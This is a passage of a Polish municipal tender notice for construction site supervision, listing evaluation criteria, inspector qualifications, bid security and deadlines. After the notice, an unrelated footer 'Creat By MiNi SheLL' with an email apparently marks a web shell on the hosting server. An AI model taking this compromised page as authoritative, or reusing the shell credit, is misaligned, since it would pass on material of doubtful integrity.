budowy na czas robót,<br/>f)	dostawa mediów na potrzeby budowy,<br/>g)	pełna obsługa geodezyjna i laboratoryjna robót<br/>h)	zapewnienie nadzoru nad robotami przez uprawnione osoby zgodnie z Umową ,<br/>i)	pozyskanie wszystkich wymaganych decyzji administracyjnych i zgłoszeń umożliwiających zgodne z prawem użytkowanie obiektu,<br/>j)	świadczenie gwarancji i rękojmi przez okres 7 lat od daty odbioru końcowego.<br/>k)	koordynacja robót z równolegle trwającymi pracami dla Części 1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71521000-6 - Usługi nadzorowania placu budowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która nie zostanie odrzucona na podstawie art. 226 ust. 1<br/>Pzp oraz uzyska maksymalną liczbę punktów na podstawie kryteriów oceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kadry Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Odpowiednio dla Części 1 i Części 2<br/>1.Zamawiający określa poniższe warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>Minimalne poziomy zdolności w zakresie osób, które zostaną skierowane przez Wykonawcę do realizacji zamówienia. Zamawiający uzna warunek za spełniony w stosunku do Wykonawców, którzy dysponują lub będą dysponować osobą zdolną do wykonania zamówienia tj.: <br/>a)	osobą, która będzie pełnić funkcję koordynatora inspektorów nadzoru inwestorskiego we wszystkich branżach i inspektora nadzoru inwestorskiego w branży drogowej i zieleni, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej zgodnie z ustawą Prawo budowlane, oraz doświadczenie zawodowe (w ramach jednej osoby) polegające na pełnieniu funkcji inspektora nadzoru lub funkcji kierownika budowy (w rozumieniu art. 12 ust. 1 pkt. 2 i 4 ustawy prawo budowlane) przy realizacji co najmniej dwóch zadań: budowy lub przebudowy drogi, które obejmowały swym zakresem wykonanie kompleksowej budowy/wymiany warstw konstrukcyjnych jezdni (wszystkie warstwy konstrukcyjne tj. podbudowy i nawierzchnie) długości odcinka (kilometraż) drogi co najmniej 0,5 km każda<br/>b)	osobą, która będzie pełnić funkcję inspektora nadzoru inwestorskiego w branży sanitarnej (wod.-kan.), która posiada uprawnienia budowlane do kierowania robotami budowlanymi w zakresie sieci i urządzeń wodociągowych i kanalizacyjnych, oraz doświadczenie zawodowe (w ramach jednej osoby) polegające na pełnieniu funkcji inspektora nadzoru lub funkcji kierownika budowy lub funkcji kierownika robót (w rozumieniu art. 12 ust. 1 pkt. 2 i 4 ustawy Prawo budowlane) przy realizacji co najmniej jednego zadania obejmującego budowę lub przebudowę sieci kanalizacji sanitarnej i / lub deszczowej o długości odcinka co najmniej 0,5 km w jednym zadaniu ( w przypadku wykonania w jednym zadaniu np. 0,25 km sieci kanalizacji sanitarnej i 0,25 km sieci kanalizacji deszczowej – warunek zostanie spełniony),<br/>c)	osobą, która będzie pełnić funkcję inspektora nadzoru inwestorskiego w branży gazowej, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń gazowych, oraz doświadczenie zawodowe (w ramach jednej osoby) polegające na pełnieniu funkcji inspektora nadzoru lub funkcji kierownika budowy lub funkcji kierownika robót (w rozumieniu art. 12 ust. 1 pkt. 2 i 4 ustawy Prawo budowlane) przy realizacji co najmniej jednego zadania obejmującego budowę lub przebudowę sieci gazowej o długości odcinka co najmniej 0,5 km w jednym zadaniu,<br/>d)	osobą, która będzie pełnić funkcję inspektora nadzoru inwestorskiego w branży telekomunikacyjnej, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń telekomunikacyjnych, lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, które obejmowały kierowanie robotami w zakresie telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą.<br/>e)	osobą, która będzie pełnić funkcję inspektora nadzoru inwestorskiego w branży elektrycznej, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, oraz doświadczenie zawodowe (w ramach jednej osoby) polegające na pełnieniu funkcji inspektora nadzoru lub funkcji kierownika budowy lub funkcji kierownika robót (w rozumieniu art. 12 ust. 1 pkt. 2 i 4 ustawy Prawo budowlane) przy realizacji co najmniej jednego zadania obejmującego budowę lub przebudowę linii elektroenergetycznych kablowych o długości co najmniej 0,5 km w jednym zadaniu. (Uwaga: linie kablowe oświetlenia ulicznego nie są liniami elektroenergetycznymi nn).<br/>UWAGA: <br/>1)	Wymagane doświadczenie zawodowe w warunku minimalnym i w „kryterium pozacenowym” winno zostać wykazane przez jedną osobę (w poszczególnych branżach). <br/>2)	W przypadku wykazania dodatkowego doświadczenia zawodowego przez osobę inną niż w warunku podstawowym, doświadczenie to nie będzie brane pod uwagę w ocenie kryterium pozacenowym.<br/>3)	Punkty zostaną przyznane tylko za te zadania, które nie będą wymienione w wykazie osób składanym na wezwanie Zamawiającego dotyczącym spełniania warunku udziału <br/>w postępowaniu.<br/>4)	Dopuszcza się łączenie funkcji inspektorów poszczególnych branż pod warunkiem wykazania się przez osobę/osoby wymaganymi uprawnieniami i doświadczeniem. <br/>5)	Doświadczenie zawodowe osoby wykazanej w celu spełnienia warunku dotyczy doświadczenia zawodowego w ramach jednej osoby. <br/>6) Wskazane osoby, powinny posiadać uprawnienia budowlane i doświadczenie zawodowe adekwatne do wykonywanych czynności objętych przedmiotem zamówienia. <br/>7) Wskazane osoby powinny posiadać biegłą znajomość języka polskiego, która zapewni należyte pełnienie określonych funkcji. W przypadku, gdy wskazane osoby nie posiadają biegłej znajomości języka polskiego Wykonawca jest zobowiązany zapewnić tłumacza(y) języka polskiego, zapewniającego stałe, biegłe i fachowe tłumaczenie w kontaktach między Zamawiającym a Wykonawcą, na okres i dla potrzeb realizacji zamówienia. <br/>8)	W przypadku składania oferty na więcej niż jedną część zamówienia Zamawiający dopuszcza wskazanie tych samych osób, w celu potwierdzenia spełniania warunków udziału w postępowaniu dla każdej z części.<br/>9) Przez ww. uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994r. Prawo budowlane oraz w Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <br/>10)W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stron umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art. 4a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa), osoby wyznaczone do realizacji zamówienia posiadają uprawnienia budowlane do projektowania i kierowania, wyszczególnione wyżej jeżeli: <br/>a) nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień budowlanych do projektowania i kierowania, oraz <br/>b) posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku braku decyzji o uznaniu kwalifikacji zawodowych zostały spełnione w stosunku do tych osób wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa, dotyczące świadczenia usług transgranicznych.<br/>2.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3.	W przypadkach, o którym mowa w ust. 2, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Formularz oświadczenia stanowi załącznik do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpowiednio dla Części 1 i Części 2<br/>Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Odpowiednio dla Części 1 i Części 2<br/>Zamawiający żąda poniższych podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z wzorem stanowiącym Załącznik do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie określa przedmiotowych środków dowodowych w celu potwierdzenia zgodności oferowanych dostaw, usług lub robót budowlanych z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub opisie kryteriów oceny ofert, lub wymaganiami związanymi z realizacją zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty wykonawca dołącza odpowiednio dla Części 1 i Części 2:<br/>1)	Załącznik do formularza ofertowego, jeżeli stara się o punkty w kryterium „doświadczenie kadry Wykonawcy”<br/>2)	aktualne na dzień składania ofert oświadczenie/oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu.<br/>3)	zobowiązanie podmiotu do udostępnienia zasobów, jeżeli wykonawca polega na zasobach innego podmiotu,<br/>4)	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (jeżeli dotyczy);<br/>5)	uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, jeżeli wykonawca zastrzegł w ofercie informacje jako tajemnicę przedsiębiorstwa;<br/>6)	dokumenty potwierdzające wniesienie wadium, określone w punkcie 22 SWZ;<br/>7)	dokumenty, o których mowa w pkt 21.6-21.9 SWZ;<br/>8)	pełnomocnictwo, jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający określa kwotę wadium:<br/>Dla części 1 w wysokości 3 000,00 zł (słownie: trzy tysiące złotych 00/100)<br/>Dla części 2 w wysokości 6 000,00 zł(słownie: sześć tysięcy złotych 00/100)<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofert.<br/>3.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy nr 93 8978 0008 0000 0244 2000 0040 z dopiskiem WADIUM – ZP.271.29.2022 część …<br/>5.	Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto zamawiającego przed upływem terminu składnia ofert.<br/>6.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>7.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2–4, wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>8.	W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczenia, gwarancja lub poręczenie powinno być sporządzone zgodnie z obowiązującym prawem i winno zawierać następujące elementy:<br/>1)	nazwę dającego zlecenie (wykonawcy) (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia – zaleca się wymienienie wszystkich wykonawców), beneficjenta gwarancji lub poręczenia (zamawiającego), gwaranta lub poręczyciela (np. banku lub instytucji ubezpieczeniowej udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,<br/>2)	określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,<br/>3)	kwotę gwarancji lub poręczenia,<br/>4)	termin ważności gwarancji lub poręczenia (który nie może być krótszy niż termin związania wykonawcy złożoną przez niego ofertą),<br/>5)	gwarancja lub poręcznie winny umożliwić wniesienie roszczenia za zdarzenie mające miejsce w okresie obowiązywania terminu związania ofertą również po jego upływie – z zastrzeżeniem, że jeżeli koniec terminu do żądania wypłaty z gwarancji lub poręczenia przypada na dzień uznany za ustawowo wolny od pracy oraz sobotę, wówczas termin ten ulega wydłużeniu do najbliższego dnia roboczego – pod rygorem uznania, że wadium wniesiono w sposób nieprawidłowy.<br/>6)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie zamawiającego zawierające oświadczenie, iż:<br/>a)	wykonawca, którego ofertę wybrano: (i) odmówił podpisania umowy na warunkach określonych w ofercie, lub (ii) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub (iii) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy;<br/>b)	wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej <br/>7)	oznaczenie postępowania, którego wadium dotyczy.<br/>9.	Zamawiający zwraca wadium zgodnie z zasadami opisanymi w art. 98 ust.1,2,4,i 5 Pzp.<br/>10.	Złożenie wniosku o zwrot wadium, o którym mowa w art. 98 ust. 3 Pzp, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX Pzp.<br/>11.	Zamawiający zatrzymuje wadium zgodnie z zasadami opisanymi w art. 98 ust. 6 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2.	W przypadku, o którym mowa w pkt 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.	Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>4.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań dotyczących:<br/>1)	zamówień na roboty budowlane lub usługi;<br/>2)	prac związanych z rozmieszczeniem i instalacją, w ramach zamówienia na dostawy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy. Rodzaj i zakres zmian oraz warunki ich wprowadzenia zostały zamieszczone w<br/>projektowanych postanowieniach umowy - wzorze umowy, stanowiącym załącznik do SWZ dostępny na stronie https://ezp.kleszczow.pl/procurements <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-18 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez system E-ZP dostępny pod adresem: https://ezp. kleszczow.pl/procurements</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-18 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com